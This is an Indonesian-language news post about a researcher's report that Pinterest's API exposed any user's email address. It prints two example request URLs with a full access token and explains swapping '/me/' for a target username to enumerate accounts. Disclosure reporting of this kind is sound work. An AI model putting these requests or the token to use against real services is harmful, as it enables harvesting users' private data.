Inwepo News - Security researcher Dan Melamed menemukan bug dan exploit yang dapat mencuri informasi akun semua pengguna di jejaring sosial Pinterest, ini akan berdampak serius tentang keamanan privasi setiap penggunanya
Pinterest adalah media sosial yang sangat populer, lebih dari 70 juta pengguna , Security researcher Dan Melamed telah menemukan cara untuk mengakses semua informasi dengan mengakses token di setiap id pengguna seperti berikut ini
https://api.pinterest.com/v3/users/me/?access_token =MTQzMTYwMjozNTcxOTE5NTE2MDQyNjcxNzc6MnwxMzc3MDY4ODMyOjAtLTE2ZWJjNDg4NzYxYTFmZWIwZmU0ODcxYzc3ZWUyN2E2YTdhOWNlN2I =Mengganti "/ me /" bagian dari link dengan username pengguna Pinterest lmemungkinkan untuk melihat informasi alamat email-nya.
Misalnya link berikut menunjukkan alamat email bagi pengguna "pinterest"
https://api.pinterest.com/v3/users/pinterest/?access_token=MTQzMTYwMjozNTcxOTE5NTE2MDQyNjcxNzc6MnwxMzc3MDY4ODMyOjAtLTE2ZWJjNDg4NzYxYTFmZWIwZmU0ODcxYzc3ZWUyN2E2YTdhOWNlN2I =Berikut ini bukti video tutorial bagaimana team Security researcher Dan Melamed melakukannya
http://youtu.be/Af7y1U2L2NM
Postingan
0 komentar
Posting Komentar